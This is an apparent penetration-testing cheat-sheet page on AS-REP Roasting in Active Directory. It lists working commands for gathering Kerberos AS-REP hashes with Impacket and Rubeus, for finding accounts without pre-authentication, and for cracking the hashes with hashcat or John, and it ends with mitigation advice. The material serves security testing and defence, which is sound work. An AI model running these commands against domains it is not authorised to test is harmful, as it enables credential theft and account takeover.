Back to Active Directory

Asrep Roasting

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

AS-REP Roasting exploits users without Kerberos pre-authentication enabled. When pre-authentication is disabled, an attacker can request an AS-REP ticket for any user and receive encrypted data that can be cracked offline.

This attack targets the Kerberos authentication protocol and is effective against accounts with the UF_DONT_REQUIRE_PREAUTH flag set.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Asrep Roasting:

impacket-GetNPUsers -dc-ip 10.10.10.10 domain.local/ -format hashcat -usersfile users.txt
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Get-NetUser -PreauthNotRequired | select name,samaccountname
hashcat -m 18200 hashes.txt wordlist.txt
john --format=krb5asrep hashes.txt --wordlist=wordlist.txt

Tools & Techniques

Recommended tools for Asrep Roasting:

  • Impacket GetNPUsers: gather AS-REP hashes from domain
  • Rubeus: .NET tool for Kerberos interaction
  • PowerView: identify users without pre-authentication
  • Hashcat (mode 18200) or John for offline cracking

Prevention & Mitigation

Security recommendations to prevent Asrep Roasting:

  • Enable Kerberos pre-authentication for all user accounts
  • Identify and audit accounts with UF_DONT_REQUIRE_PREAUTH set
  • Use strong, complex passwords for all service accounts
  • Monitor for AS-REP request anomalies in security logs (Event ID 4768)

References

Additional resources: